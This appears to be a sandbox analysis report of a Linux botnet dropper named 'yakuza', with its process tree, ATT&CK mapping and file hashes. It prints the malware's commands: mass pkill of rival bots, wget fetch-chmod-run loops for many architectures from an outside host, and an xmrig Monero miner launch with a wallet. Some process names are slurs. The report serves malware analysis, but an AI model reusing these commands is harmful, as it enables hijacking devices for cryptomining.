    sh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"
    3⤵
    PID:1086
  - - /usr/bin/pkill
      pkill -9 helpmedaddthhhhh
      4⤵
      Reads CPU attributes
      PID:1087
  - - /bin/busybox
      busybox pkill -9 helpmedaddthhhhh
      4⤵
      PID:1088
- - /bin/sh
    sh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"
    3⤵
    PID:1089
  - - /usr/bin/pkill
      pkill -9 2wgg9qphbq
      4⤵
      Reads runtime system information
      PID:1090
  - - /bin/busybox
      busybox pkill -9 2wgg9qphbq
      4⤵
      PID:1091
- - /bin/sh
    sh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"
    3⤵
    PID:1092
  - - /usr/bin/pkill
      pkill -9 Slav3Th3seD3vices
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1093
  - - /bin/busybox
      busybox pkill -9 Slav3Th3seD3vices
      4⤵
      PID:1094
- - /bin/sh
    sh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"
    3⤵
    PID:1095
  - - /usr/bin/pkill
      pkill -9 hzSmYZjYMQ
      4⤵
      PID:1096
  - - /bin/busybox
      busybox pkill -9 hzSmYZjYMQ
      4⤵
      PID:1097
- - /bin/sh
    sh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"
    3⤵
    PID:1098
  - - /usr/bin/pkill
      pkill -9 5Gbf
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1099
  - - /bin/busybox
      busybox pkill -9 5Gbf
      4⤵
      PID:1100
- - /bin/sh
    sh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"
    3⤵
    PID:1101
  - - /usr/bin/pkill
      pkill -9 SoRAxD123LOL
      4⤵
      PID:1102
  - - /bin/busybox
      busybox pkill -9 SoRAxD123LOL
      4⤵
      PID:1103
- - /bin/sh
    sh -c "pkill -9 iaGv || busybox pkill -9 iaGv"
    3⤵
    PID:1104
  - - /usr/bin/pkill
      pkill -9 iaGv
      4⤵
      Reads CPU attributes
      PID:1105
  - - /bin/busybox
      busybox pkill -9 iaGv
      4⤵
      PID:1106
- - /bin/sh
    sh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"
    3⤵
    PID:1107
  - - /usr/bin/pkill
      pkill -9 5aA3
      4⤵
      Reads CPU attributes
      PID:1108
  - - /bin/busybox
      busybox pkill -9 5aA3
      4⤵
      PID:1109
- - /bin/sh
    sh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"
    3⤵
    PID:1110
  - - /usr/bin/pkill
      pkill -9 SoRAxD420LOL
      4⤵
      PID:1111
  - - /bin/busybox
      busybox pkill -9 SoRAxD420LOL
      4⤵
      PID:1112
- - /bin/sh
    sh -c "pkill -9 insomni || busybox pkill -9 insomni"
    3⤵
    PID:1113
  - - /usr/bin/pkill
      pkill -9 insomni
      4⤵
      PID:1114
  - - /bin/busybox
      busybox pkill -9 insomni
      4⤵
      PID:1115
- - /bin/sh
    sh -c "pkill -9 640277 || busybox pkill -9 640277"
    3⤵
    PID:1116
  - - /usr/bin/pkill
      pkill -9 640277
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1117
  - - /bin/busybox
      busybox pkill -9 640277
      4⤵
      PID:1118
- - /bin/sh
    sh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"
    3⤵
    PID:1119
  - - /usr/bin/pkill
      pkill -9 SoraBeReppin1337
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1120
  - - /bin/busybox
      busybox pkill -9 SoraBeReppin1337
      4⤵
      PID:1121
- - /bin/sh
    sh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"
    3⤵
    - System Network Configuration Discovery
    PID:1122
  - - /usr/bin/pkill
      pkill -9 ipcamCache
      4⤵
      Reads CPU attributes
      System Network Configuration Discovery
      PID:1123
  - - /bin/busybox
      busybox pkill -9 ipcamCache
      4⤵
      System Network Configuration Discovery
      PID:1124
- - /bin/sh
    sh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"
    3⤵
    PID:1125
  - - /usr/bin/pkill
      pkill -9 66tlGg9Q
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1126
  - - /bin/busybox
      busybox pkill -9 66tlGg9Q
      4⤵
      PID:1127
- - /bin/sh
    sh -c "pkill -9 T || busybox pkill -9 T"
    3⤵
    PID:1128
  - - /usr/bin/pkill
      pkill -9 T
      4⤵
      Reads runtime system information
      PID:1129
  - - /bin/busybox
      busybox pkill -9 T
      4⤵
      PID:1130
- - /bin/sh
    sh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"
    3⤵
    PID:1131
  - - /usr/bin/pkill
      pkill -9 jUYfouyf87
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1132
  - - /bin/busybox
      busybox pkill -9 jUYfouyf87
      4⤵
      PID:1133
- - /bin/sh
    sh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"
    3⤵
    PID:1134
  - - /usr/bin/pkill
      pkill -9 6ke3
      4⤵
      Reads CPU attributes
      PID:1135
  - - /bin/busybox
      busybox pkill -9 6ke3
      4⤵
      PID:1136
- - /bin/sh
    sh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"
    3⤵
    PID:1137
  - - /usr/bin/pkill
      pkill -9 TOKYO3
      4⤵
      Reads runtime system information
      PID:1138
  - - /bin/busybox
      busybox pkill -9 TOKYO3
      4⤵
      PID:1139
- - /bin/sh
    sh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"
    3⤵
    PID:1140
  - - /usr/bin/pkill
      pkill -9 lyEeaXul2dULCVxh
      4⤵
      Reads CPU attributes
      PID:1141
  - - /bin/busybox
      busybox pkill -9 lyEeaXul2dULCVxh
      4⤵
      PID:1142
- - /bin/sh
    sh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"
    3⤵
    PID:1143
  - - /usr/bin/pkill
      pkill -9 93OfjHZ2z
      4⤵
      Reads runtime system information
      PID:1144
  - - /bin/busybox
      busybox pkill -9 93OfjHZ2z
      4⤵
      PID:1145
- - /bin/sh
    sh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"
    3⤵
    PID:1146
  - - /usr/bin/pkill
      pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      Reads CPU attributes
      PID:1147
  - - /bin/busybox
      busybox pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      PID:1148
- - /bin/sh
    sh -c "pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l"
    3⤵
    PID:1149
  - - /usr/bin/pkill
      pkill -9 mMkiy6f87l
      4⤵
      PID:1150
  - - /bin/busybox
      busybox pkill -9 mMkiy6f87l
      4⤵
      PID:1151
- - /bin/sh
    sh -c "pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU"
    3⤵
    PID:1152
  - - /usr/bin/pkill
      pkill -9 A023UU4U24UIU
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1153
  - - /bin/busybox
      busybox pkill -9 A023UU4U24UIU
      4⤵
      PID:1154
- - /bin/sh
    sh -c "pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd"
    3⤵
    PID:1155
  - - /usr/bin/pkill
      pkill -9 TheWeeknd
      4⤵
      PID:1156
  - - /bin/busybox
      busybox pkill -9 TheWeeknd
      4⤵
      PID:1157
- - /bin/sh
    sh -c "pkill -9 mioribitches || busybox pkill -9 mioribitches"
    3⤵
    PID:1158
  - - /usr/bin/pkill
      pkill -9 mioribitches
      4⤵
      Reads CPU attributes
      PID:1159
  - - /bin/busybox
      busybox pkill -9 mioribitches
      4⤵
      PID:1160
- - /bin/sh
    sh -c "pkill -9 A5p9 || busybox pkill -9 A5p9"
    3⤵
    PID:1161
  - - /usr/bin/pkill
      pkill -9 A5p9
      4⤵
      PID:1162
  - - /bin/busybox
      busybox pkill -9 A5p9
      4⤵
      PID:1163
- - /bin/sh
    sh -c "pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds"
    3⤵
    PID:1164
  - - /usr/bin/pkill
      pkill -9 TheWeeknds
      4⤵
      PID:1165
  - - /bin/busybox
      busybox pkill -9 TheWeeknds
      4⤵
      PID:1166
- - /bin/sh
    sh -c "pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi"
    3⤵
    PID:1167
  - - /usr/bin/pkill
      pkill -9 mnblkjpoi
      4⤵
      Reads CPU attributes
      PID:1168
  - - /bin/busybox
      busybox pkill -9 mnblkjpoi
      4⤵
      PID:1169
- - /bin/sh
    sh -c "pkill -9 AbAd || busybox pkill -9 AbAd"
    3⤵
    PID:1170
  - - /usr/bin/pkill
      pkill -9 AbAd
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1171
  - - /bin/busybox
      busybox pkill -9 AbAd
      4⤵
      PID:1172
- - /bin/sh
    sh -c "pkill -9 Tokyos || busybox pkill -9 Tokyos"
    3⤵
    PID:1173
  - - /usr/bin/pkill
      pkill -9 Tokyos
      4⤵
      PID:1174
  - - /bin/busybox
      busybox pkill -9 Tokyos
      4⤵
      PID:1175
- - /bin/sh
    sh -c "pkill -9 neb || busybox pkill -9 neb"
    3⤵
    PID:1176
  - - /usr/bin/pkill
      pkill -9 neb
      4⤵
      PID:1177
  - - /bin/busybox
      busybox pkill -9 neb
      4⤵
      PID:1178
- - /bin/sh
    sh -c "pkill -9 Akiru || busybox pkill -9 Akiru"
    3⤵
    PID:1179
  - - /usr/bin/pkill
      pkill -9 Akiru
      4⤵
      Reads CPU attributes
      PID:1180
  - - /bin/busybox
      busybox pkill -9 Akiru
      4⤵
      PID:1181
- - /bin/sh
    sh -c "pkill -9 U8inTz || busybox pkill -9 U8inTz"
    3⤵
    PID:1182
  - - /usr/bin/pkill
      pkill -9 U8inTz
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1183
  - - /bin/busybox
      busybox pkill -9 U8inTz
      4⤵
      PID:1184
- - /bin/sh
    sh -c "pkill -9 netstats || busybox pkill -9 netstats"
    3⤵
    PID:1185
  - - /usr/bin/pkill
      pkill -9 netstats
      4⤵
      Reads runtime system information
      PID:1186
  - - /bin/busybox
      busybox pkill -9 netstats
      4⤵
      PID:1187
- - /bin/sh
    sh -c "pkill -9 Alex || busybox pkill -9 Alex"
    3⤵
    PID:1188
  - - /usr/bin/pkill
      pkill -9 Alex
      4⤵
      Reads CPU attributes
      PID:1189
  - - /bin/busybox
      busybox pkill -9 Alex
      4⤵
      PID:1190
- - /bin/sh
    sh -c "pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T"
    3⤵
    PID:1191
  - - /usr/bin/pkill
      pkill -9 W9RCAKM20T
      4⤵
      PID:1192
  - - /bin/busybox
      busybox pkill -9 W9RCAKM20T
      4⤵
      PID:1193
- - /bin/sh
    sh -c "pkill -9 newnetword || busybox pkill -9 newnetword"
    3⤵
    PID:1194
  - - /usr/bin/pkill
      pkill -9 newnetword
      4⤵
      PID:1195
  - - /bin/busybox
      busybox pkill -9 newnetword
      4⤵
      PID:1196
- - /bin/sh
    sh -c "pkill -9 Ayo215 || busybox pkill -9 Ayo215"
    3⤵
    PID:1197
  - - /usr/bin/pkill
      pkill -9 Ayo215
      4⤵
      PID:1198
  - - /bin/busybox
      busybox pkill -9 Ayo215
      4⤵
      PID:1199
- - /bin/sh
    sh -c "pkill -9 Word || busybox pkill -9 Word"
    3⤵
    PID:1200
  - - /usr/bin/pkill
      pkill -9 Word
      4⤵
      Reads runtime system information
      PID:1201
  - - /bin/busybox
      busybox pkill -9 Word
      4⤵
      PID:1202
- - /bin/sh
    sh -c "pkill -9 nloads || busybox pkill -9 nloads"
    3⤵
    PID:1203
  - - /usr/bin/pkill
      pkill -9 nloads
      4⤵
      Reads CPU attributes
      PID:1204
  - - /bin/busybox
      busybox pkill -9 nloads
      4⤵
      PID:1205
- - /bin/sh
    sh -c "pkill -9 BAdAsV || busybox pkill -9 BAdAsV"
    3⤵
    PID:1206
  - - /usr/bin/pkill
      pkill -9 BAdAsV
      4⤵
      Reads runtime system information
      PID:1207
  - - /bin/busybox
      busybox pkill -9 BAdAsV
      4⤵
      PID:1208
- - /bin/sh
    sh -c "pkill -9 Wordmane || busybox pkill -9 Wordmane"
    3⤵
    PID:1209
  - - /usr/bin/pkill
      pkill -9 Wordmane
      4⤵
      PID:1210
  - - /bin/busybox
      busybox pkill -9 Wordmane
      4⤵
      PID:1211
- - /bin/sh
    sh -c "pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa"
    3⤵
    PID:1212
  - - /usr/bin/pkill
      pkill -9 notyakuzaa
      4⤵
      Reads runtime system information
      PID:1213
  - - /bin/busybox
      busybox pkill -9 notyakuzaa
      4⤵
      PID:1214
- - /bin/sh
    sh -c "pkill -9 Belch || busybox pkill -9 Belch"
    3⤵
    PID:1215
  - - /usr/bin/pkill
      pkill -9 Belch
      4⤵
      Reads runtime system information
      PID:1216
  - - /bin/busybox
      busybox pkill -9 Belch
      4⤵
      PID:1217
- - /bin/sh
    sh -c "pkill -9 Wordnets || busybox pkill -9 Wordnets"
    3⤵
    PID:1218
  - - /usr/bin/pkill
      pkill -9 Wordnets
      4⤵
      Reads runtime system information
      PID:1219
  - - /bin/busybox
      busybox pkill -9 Wordnets
      4⤵
      PID:1220
- - /bin/sh
    sh -c "pkill -9 obp || busybox pkill -9 obp"
    3⤵
    PID:1221
  - - /usr/bin/pkill
      pkill -9 obp
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1222
  - - /bin/busybox
      busybox pkill -9 obp
      4⤵
      PID:1223
- - /bin/sh
    sh -c "pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420"
    3⤵
    PID:1224
  - - /usr/bin/pkill
      pkill -9 BigN0gg0r420
      4⤵
      PID:1225
  - - /bin/busybox
      busybox pkill -9 BigN0gg0r420
      4⤵
      PID:1226
- - /bin/sh
    sh -c "pkill -9 X0102I34f || busybox pkill -9 X0102I34f"
    3⤵
    PID:1227
  - - /usr/bin/pkill
      pkill -9 X0102I34f
      4⤵
      PID:1228
  - - /bin/busybox
      busybox pkill -9 X0102I34f
      4⤵
      PID:1229
- - /bin/sh
    sh -c "pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi"
    3⤵
    PID:1230
  - - /usr/bin/pkill
      pkill -9 ofhasfhiafhoi
      4⤵
      PID:1231
  - - /bin/busybox
      busybox pkill -9 ofhasfhiafhoi
      4⤵
      PID:1232
- - /bin/sh
    sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
    3⤵
    PID:1233
  - - /usr/bin/pkill
      pkill -9 BzSxLxBxeY
      4⤵
      Reads CPU attributes
      PID:1234
  - - /bin/busybox
      busybox pkill -9 BzSxLxBxeY
      4⤵
      PID:1235
- - /bin/sh
    sh -c "pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU"
    3⤵
    PID:1236
  - - /usr/bin/pkill
      pkill -9 X19I239124UIU
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1237
  - - /bin/busybox
      busybox pkill -9 X19I239124UIU
      4⤵
      PID:1238
- - /bin/sh
    sh -c "pkill -9 oism || busybox pkill -9 oism"
    3⤵
    PID:1239
  - - /usr/bin/pkill
      pkill -9 oism
      4⤵
      PID:1240
  - - /bin/busybox
      busybox pkill -9 oism
      4⤵
      PID:1241
- - /bin/sh
    sh -c "pkill -9 Deported || busybox pkill -9 Deported"
    3⤵
    PID:1242
  - - /usr/bin/pkill
      pkill -9 Deported
      4⤵
      Reads CPU attributes
      PID:1243
  - - /bin/busybox
      busybox pkill -9 Deported
      4⤵
      PID:1244
- - /bin/sh
    sh -c "pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO"
    3⤵
    PID:1245
  - - /usr/bin/pkill
      pkill -9 XSHJEHHEIIHWO
      4⤵
      Reads CPU attributes
      PID:1246
  - - /bin/busybox
      busybox pkill -9 XSHJEHHEIIHWO
      4⤵
      PID:1247
- - /bin/sh
    sh -c "pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12"
    3⤵
    PID:1248
  - - /usr/bin/pkill
      pkill -9 olsVNwo12
      4⤵
      PID:1249
- /bin/rm
  rm -rf yakuza.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:750
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.sh
  2⤵
  - Writes file to tmp directory
  PID:754
- /bin/chmod
  chmod +x yakuza.sh
  2⤵
  - File and Directory Permissions Modification
  PID:761
- /tmp/yakuza.sh
  ./yakuza.sh
  2⤵
  PID:762
- /bin/rm
  rm -rf yakuza.sh
  2⤵
  PID:765
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.x86
  2⤵
  - Writes file to tmp directory
  PID:767
- /bin/chmod
  chmod +x yakuza.x86
  2⤵
  - File and Directory Permissions Modification
  PID:778
- /tmp/yakuza.x86
  ./yakuza.x86
  2⤵
  PID:780
- /bin/rm
  rm -rf yakuza.x86
  2⤵
  PID:782
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm6
  2⤵
  - Writes file to tmp directory
  PID:783
- /bin/chmod
  chmod +x yakuza.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/yakuza.arm6
  ./yakuza.arm6
  2⤵
  PID:813
- /bin/rm
  rm -rf yakuza.arm6
  2⤵
  PID:816
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.i686
  2⤵
  - Writes file to tmp directory
  PID:817
- /bin/chmod
  chmod +x yakuza.i686
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/yakuza.i686
  ./yakuza.i686
  2⤵
  PID:847
- /bin/rm
  rm -rf yakuza.i686
  2⤵
  PID:851
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.ppc
  2⤵
  - Writes file to tmp directory
  PID:853
- /bin/chmod
  chmod +x yakuza.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/yakuza.ppc
  ./yakuza.ppc
  2⤵
  PID:879
- /bin/rm
  rm -rf yakuza.ppc
  2⤵
  PID:881
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.i586
  2⤵
  - Writes file to tmp directory
  PID:882
- /bin/chmod
  chmod +x yakuza.i586
  2⤵
  - File and Directory Permissions Modification
  PID:892
- /tmp/yakuza.i586
  ./yakuza.i586
  2⤵
  PID:893
- /bin/rm
  rm -rf yakuza.i586
  2⤵
  PID:897
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.m68k
  2⤵
  - Writes file to tmp directory
  PID:898
- /bin/chmod
  chmod +x yakuza.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:911
- /tmp/yakuza.m68k
  ./yakuza.m68k
  2⤵
  PID:912
- /bin/rm
  rm -rf yakuza.m68k
  2⤵
  PID:915
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm4
  2⤵
  - Writes file to tmp directory
  PID:917
- /bin/chmod
  chmod +x yakuza.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:953
- /tmp/yakuza.arm4
  ./yakuza.arm4
  2⤵
  PID:954
- /bin/rm
  rm -rf yakuza.arm4
  2⤵
  PID:956
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm5
  2⤵
  - Writes file to tmp directory
  PID:957
- /bin/chmod
  chmod +x yakuza.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:964
- /tmp/yakuza.arm5
  ./yakuza.arm5
  2⤵
  PID:965
- /bin/rm
  rm -rf yakuza.arm5
  2⤵
  PID:967
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.arm7
  2⤵
  - Writes file to tmp directory
  PID:968
- /bin/chmod
  chmod +x yakuza.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:972
- /tmp/yakuza.arm7
  ./yakuza.arm7
  2⤵
  PID:974
- /bin/rm
  rm -rf yakuza.arm7
  2⤵
  PID:978
- /usr/bin/wget
  wget http://linux-it.abuser.eu/yakuza.sparc
  2⤵
  - Writes file to tmp directory
  PID:979
- /bin/chmod
  chmod +x yakuza.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:983
- /tmp/yakuza.sparc
  ./yakuza.sparc
  2⤵
  PID:984
- /bin/rm
  rm -rf yakuza.sparc
  2⤵
  PID:986
- /bin/bash
  bash
  2⤵
  PID:988
- - /bin/ps
    ps x
    3⤵
    - Reads runtime system information
    PID:990
- - /bin/grep
    grep xmrig
    3⤵
    PID:991
- - /bin/grep
    grep -v grep
    3⤵
    PID:992
- - /bin/grep
    grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW
    3⤵
    PID:993
- - /usr/bin/curl
    curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig
    3⤵
    - Writes file to tmp directory
    PID:997
- - /bin/chmod
    chmod +x xmrig
    3⤵
    - File and Directory Permissions Modification
    PID:1035
- /usr/bin/curl
  curl -s http://linux-it.abuser.eu/test.php
  2⤵
  PID:987

/usr/bin/nohup
nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker448 --tls "--cpu-priority=3" "--asm=auto"
1⤵
PID:1036

/tmp/xmrig
./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker448 --tls "--cpu-priority=3" "--asm=auto"
1⤵
- Executes dropped EXE
PID:1036

/bin/sh
/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker448 --tls "--cpu-priority=3" "--asm=auto"
1⤵
- Writes file to tmp directory
PID:1036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/xmrig

Filesize
7.9MB

MD5
8f4fff0ded94f1141768220906abfbb8

SHA1
ea7c97294f415dc8713ac8c280b3123da62f6e56

SHA256
b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d

SHA512
0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee

Download Submit
/tmp/yakuza.mips

Filesize
183KB

MD5
371732a722f576ce663cf832412521a8

SHA1
7d8f25bfc26af545c568ffc5c0afe8c4cd35de40

SHA256
11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0

SHA512
c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

Download Submit